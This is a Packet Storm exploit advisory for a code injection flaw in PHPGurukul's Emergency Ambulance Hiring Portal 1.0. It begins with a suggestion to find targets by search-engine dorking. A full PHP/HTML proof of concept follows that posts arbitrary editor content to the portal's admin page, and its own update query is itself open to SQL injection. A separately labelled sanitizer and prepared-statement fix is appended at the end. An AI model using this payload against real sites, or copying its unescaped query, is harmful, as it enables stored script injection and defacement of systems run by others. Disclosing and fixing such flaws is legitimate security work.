Emergency Ambulance Hiring Portal 1.0 WYSIWYG Code Injection

Emergency Ambulance Hiring Portal version 1.0 suffers from a WYSIWYG code injection vulnerability.

Packet Storm

=============================================================================================================================================
| # Title : Emergency Ambulance Hiring Portal 1.0 (WYSIWYG) code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/ |
=============================================================================================================================================

poc :

[+] Dorking in Google or another search engine.

[+] Part 01 : about-us.php

[+] This payload injects code of your choice into the database via NicEdit, a WYSIWYG editor (V: 0.9 r25), which is called inside the file /hms/admin/about-us.php.

[+] Line 2 : Make sure to include your database connection here

[+] Line 44 : Send the form data using fetch API (Set your target url)

[+] Save the payload as poc.php in your localhost path.

[+] payload :

<?php
include('http://127.0.0.1/eahp/admin/includes/dbconnection.php'); // Make sure to include your database connection here

if (isset($_POST['submit'])) {
$pagetitle = $_POST['pagetitle'];
$pagedes = $con->real_escape_string($_POST['pagedes']);
$query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");

if ($query) {  
    echo '<script>alert("About Us has been updated.")</script>';  
} else {  
    echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
}  
exit;  

}
?>

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>indoushka | Update About Us Content</title>
<!-- NicEdit Script -->
<script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>
<script type="text/javascript">
// Apply NicEdit to all text areas when the DOM is loaded
bkLib.onDomLoaded(nicEditors.allTextAreas);

    // Function to handle form submission using JavaScript  
    function submitForm(event) {  
        event.preventDefault(); // Prevent default form submission

        const pagetitle = document.getElementById('pagetitle').value;  
        const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content

        // Prepare the form data to be sent  
        const formData = new FormData();  
        formData.append('pagetitle', pagetitle);  
        formData.append('pagedes', pagedes);  
        formData.append('submit', true);

        // Send the form data using fetch API  
        fetch('http://127.0.0.1/eahp/admin/about-us.php', {  
            method: 'POST',  
            body: formData,  
        })  
        .then(response => response.text())  
        .then(data => {  
            alert('About Us content has been updated successfully.');  
            console.log(data); // Handle the response from the server  
        })  
        .catch(error => {  
            console.error('Error:', error);  
        });  
    }  
</script>  
<style>  
    /* Center the form container */  
    .editor-container {  
        max-width: 800px;  
        margin: 0 auto; /* Center horizontally */  
        padding: 20px;  
        text-align: center; /* Center the content inside */  
    }

    /* Ensure the textarea takes the full width */  
    #pagedes {  
        width: 100%;  
        height: 300px;  
        margin: 0 auto;  
    }  
</style>  

</head>
<body>
<div id="app">
<div class="app-content">
<div class="main-content">
<div class="wrap-content container" id="container">
<!-- Page Title Section -->
<section id="page-title">
<div class="row">
<div class="col-sm-8">
<h1 class="mainTitle">Update the About Us Content</h1>
</div>

                    </div>  
                </section>  
                <!-- Form Section -->  
                <div class="container-fluid container-fullw bg-white">  
                    <div class="row">  
                        <div class="col-md-12">  
                            <!-- Centering the form using a wrapper div -->  
                            <div class="editor-container">  
                                <form class="forms-sample" method="post" onsubmit="submitForm(event);">  
                                    <div class="form-group">  
                                        <label for="pagetitle">Page Title</label>  
                                        <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
                                    </div>  
                                    <div class="form-group">  
                                        <label for="pagedes">Page Description</label>  
                                        <!-- NicEdit will enhance this textarea -->  
                                        <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
                                    </div>  
                                    <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
                                </form>  
                            </div>  
                        </div>  
                    </div>  
                </div>  
                <!-- End Form Section -->  
            </div>  
        </div>  
    </div>  
</div>  
<!-- Footer -->  

</body>
</html>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
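
A server-side mitigation for the injection path described above, where NicEdit content reaches tblpage as arbitrary markup. This is an added example, not part of the advisory or the vendor's code: it allowlist-sanitizes the editor HTML before storage and binds both fields as query parameters. The function names and allowlists are assumptions, the table and column names are those in the PoC's query, and the mbstring and dom extensions are assumed to be loaded.

```php
<?php
// Added example, not vendor or advisory code; the allowlists are assumptions.
const ALLOWED_TAGS  = ['p', 'br', 'b', 'i', 'u', 'strong', 'em', 'ul', 'ol', 'li', 'a', 'div', 'span'];
const ALLOWED_ATTRS = ['a' => ['href']];
function sanitize_editor_html(string $html): string
{
    // Keep non-ASCII text intact: DOMDocument::loadHTML() assumes Latin-1 input.
    $html = mb_encode_numericentity($html, [0x80, 0x10FFFF, 0, 0x1FFFFF], 'UTF-8');
    $doc  = new DOMDocument();
    $prev = libxml_use_internal_errors(true);   // tolerate sloppy editor markup
    $doc->loadHTML('<div>' . $html . '</div>');
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    $wrapper = $doc->getElementsByTagName('div')->item(0);
    $xpath   = new DOMXPath($doc);
    // Snapshot the node list first; the tree is modified while we walk it.
    foreach (iterator_to_array($xpath->query('.//* | .//comment()', $wrapper)) as $node) {
        $tag = strtolower($node->nodeName);
        if (!in_array($tag, ALLOWED_TAGS, true)) {
            // Drop script, iframe, style, comments, etc. together with their contents.
            if ($node->parentNode) { $node->parentNode->removeChild($node); }
            continue;
        }
        foreach (iterator_to_array($node->attributes) as $attr) {
            $ok = in_array($attr->nodeName, ALLOWED_ATTRS[$tag] ?? [], true);
            // Only absolute http(s) and mailto links survive; javascript:, data: etc. do not.
            if ($ok && $attr->nodeName === 'href') {
                $ok = preg_match('#^(https?://|mailto:)#i', trim($attr->value)) === 1;
            }
            if (!$ok) { $node->removeAttribute($attr->nodeName); }
        }
    }
    $out = '';
    foreach ($wrapper->childNodes as $child) { $out .= $doc->saveHTML($child); }
    return $out;
}

function save_about_us(mysqli $con, string $title, string $html): bool
{
    $clean = sanitize_editor_html($html);
    $title = trim($title);   // plain text; escape with htmlspecialchars() when rendering
    // Bound parameters keep both fields out of the SQL text.
    $stmt = $con->prepare("UPDATE tblpage SET PageTitle=?, PageDescription=? WHERE PageType='aboutus'");
    $stmt->bind_param('ss', $title, $clean);
    return $stmt->execute();
}
// Constructed sample input, not taken from the advisory.
$sample = '<p onclick="x()">Hi <b>team</b><script>alert(1)</script> <a href="javascript:x()">link</a></p>';
echo sanitize_editor_html($sample), PHP_EOL;
```

Markup that closes the wrapper early is discarded rather than passed through, so malformed input fails closed.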
